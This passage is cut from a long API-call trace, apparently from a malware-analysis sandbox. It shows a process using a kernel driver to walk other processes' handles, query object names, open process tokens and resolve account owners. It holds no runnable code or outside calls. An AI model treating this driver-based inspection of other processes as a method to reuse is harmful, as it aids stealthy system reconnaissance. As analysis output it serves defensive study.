(Object=0xfffffa8003acd3a0) returned 0x1 [0224.077] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.078] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.078] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.078] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0224.078] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.078] PsAcquireProcessExitSynchronization () returned 0x0 [0224.078] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.078] ObReferenceObjectByHandle (in: Handle=0x5c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e98dd0, HandleInformation=0x0) returned 0x0 [0224.078] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.078] PsReleaseProcessExitSynchronization () returned 0x2 [0224.078] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.078] ObQueryNameString (in: Object=0xfffffa8001e98dd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.078] ObfDereferenceObject (Object=0xfffffa8001e98dd0) returned 0x1 [0224.078] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.078] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.078] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.078] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0224.078] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.078] PsAcquireProcessExitSynchronization () returned 0x0 [0224.078] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.078] ObReferenceObjectByHandle (in: Handle=0x5d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028187c0, HandleInformation=0x0) returned 0x0 [0224.078] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.078] PsReleaseProcessExitSynchronization () returned 0x2 [0224.078] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.078] ObQueryNameString (in: Object=0xfffffa80028187c0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.078] ObfDereferenceObject (Object=0xfffffa80028187c0) returned 0x1 [0224.078] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.078] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.079] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.079] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.079] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.079] PsAcquireProcessExitSynchronization () returned 0x0 [0224.079] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.079] ObReferenceObjectByHandle (in: Handle=0x5d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00139ed40, HandleInformation=0x0) returned 0x0 [0224.079] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.079] PsReleaseProcessExitSynchronization () returned 0x2 [0224.079] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.079] ObQueryNameString (in: Object=0xfffff8a00139ed40, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.079] ObfDereferenceObject (Object=0xfffff8a00139ed40) returned 0x1 [0224.079] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.079] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.079] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.079] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0224.079] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.079] PsAcquireProcessExitSynchronization () returned 0x0 [0224.079] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.079] ObReferenceObjectByHandle (in: Handle=0x5ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002158070, HandleInformation=0x0) returned 0x0 [0224.079] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.079] PsReleaseProcessExitSynchronization () returned 0x2 [0224.079] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.079] ObQueryNameString (in: Object=0xfffffa8002158070, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.079] ObfDereferenceObject (Object=0xfffffa8002158070) returned 0x1 [0224.079] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.079] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.079] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.079] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.080] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.080] PsAcquireProcessExitSynchronization () returned 0x0 [0224.080] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.080] ObReferenceObjectByHandle (in: Handle=0x5fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001957190, HandleInformation=0x0) returned 0x0 [0224.080] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.080] PsReleaseProcessExitSynchronization () returned 0x2 [0224.080] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.080] ObQueryNameString (in: Object=0xfffff8a001957190, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.080] ObfDereferenceObject (Object=0xfffff8a001957190) returned 0x1 [0224.080] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.080] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x444) returned 0xc8 [0224.080] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0224.080] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80036e4060, HandleInformation=0x0) returned 0x0 [0224.080] ObOpenObjectByPointer (in: Object=0xfffffa80036e4060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0224.080] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2d [0224.080] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8002199b00 | out: TokenHandle=0xfffffa8002199b00*=0xc4) returned 0x0 [0224.080] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0224.080] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.080] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0224.080] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0224.082] CloseHandle (hObject=0xc4) returned 1 [0224.082] CloseHandle (hObject=0xc8) returned 1 [0224.082] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.082] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0224.082] PsLookupProcessByProcessId (in: ProcessId=0x444, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.082] PsAcquireProcessExitSynchronization () returned 0x0 [0224.082] KeStackAttachProcess (in: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880052b35d0) [0224.082] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036e5270, HandleInformation=0x0) returned 0x0 [0224.082] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.082] PsReleaseProcessExitSynchronization () returned 0x2 [0224.082] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2b [0224.082] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.082] ObfDereferenceObject (Object=0xfffffa80036e5270) returned 0x1 [0224.082] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.083] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.083] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.083] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.083] PsLookupProcessByProcessId (in: ProcessId=0x444, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.083] PsAcquireProcessExitSynchronization () returned 0x0 [0224.083] KeStackAttachProcess (in: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880052b35d0) [0224.083] ObReferenceObjectByHandle (in: Handle=0x9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0224.083] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.083] PsReleaseProcessExitSynchronization () returned 0x2 [0224.083] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2b [0224.083] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.083] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x57 [0224.083] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.083] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x454) returned 0xc8 [0224.083] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0224.083] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80036d0060, HandleInformation=0x0) returned 0x0 [0224.083] ObOpenObjectByPointer (in: Object=0xfffffa80036d0060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0224.083] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18c [0224.083] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8002199b00 | out: TokenHandle=0xfffffa8002199b00*=0xc4) returned 0x0 [0224.083] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0224.083] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.083] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0224.084] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0224.085] CloseHandle (hObject=0xc4) returned 1 [0224.085] CloseHandle (hObject=0xc8) returned 1 [0224.085] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.085] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0224.085] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.085] PsAcquireProcessExitSynchronization () returned 0x0 [0224.085] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.085] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036cf730, HandleInformation=0x0) returned 0x0 [0224.085] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.085] PsReleaseProcessExitSynchronization () returned 0x2 [0224.086] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.086] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.086] ObfDereferenceObject (Object=0xfffffa80036cf730) returned 0x1 [0224.086] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.086] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.086] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.086] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x102, lpOverlapped=0x0) returned 1 [0224.086] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.086] PsAcquireProcessExitSynchronization () returned 0x0 [0224.086] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.086] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003705070, HandleInformation=0x0) returned 0x0 [0224.086] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.086] PsReleaseProcessExitSynchronization () returned 0x2 [0224.086] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.086] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.086] ObfDereferenceObject (Object=0xfffffa8003705070) returned 0x1 [0224.086] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.086] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.086] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.086] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0224.086] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.086] PsAcquireProcessExitSynchronization () returned 0x0 [0224.086] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.087] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0224.087] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.087] PsReleaseProcessExitSynchronization () returned 0x2 [0224.087] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.087] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.087] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0x11 [0224.087] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.087] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.087] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.087] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.087] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.087] PsAcquireProcessExitSynchronization () returned 0x0 [0224.087] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.087] ObReferenceObjectByHandle (in: Handle=0x114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0224.087] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.087] PsReleaseProcessExitSynchronization () returned 0x2 [0224.087] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.087] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.087] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x57 [0224.087] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.087] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.087] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.087] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0224.087] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.087] PsAcquireProcessExitSynchronization () returned 0x0 [0224.087] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.087] ObReferenceObjectByHandle (in: Handle=0x13c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037252d0, HandleInformation=0x0) returned 0x0 [0224.087] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.088] PsReleaseProcessExitSynchronization () returned 0x2 [0224.088] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.088] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.088] ObfDereferenceObject (Object=0xfffffa80037252d0) returned 0x1 [0224.088] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.088] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.088] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.088] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.088] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.088] PsAcquireProcessExitSynchronization () returned 0x0 [0224.088] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.088] ObReferenceObjectByHandle (in: Handle=0x144, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037201f0, HandleInformation=0x0) returned 0x0 [0224.088] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.088] PsReleaseProcessExitSynchronization () returned 0x2 [0224.088] ObfDereferenceObject 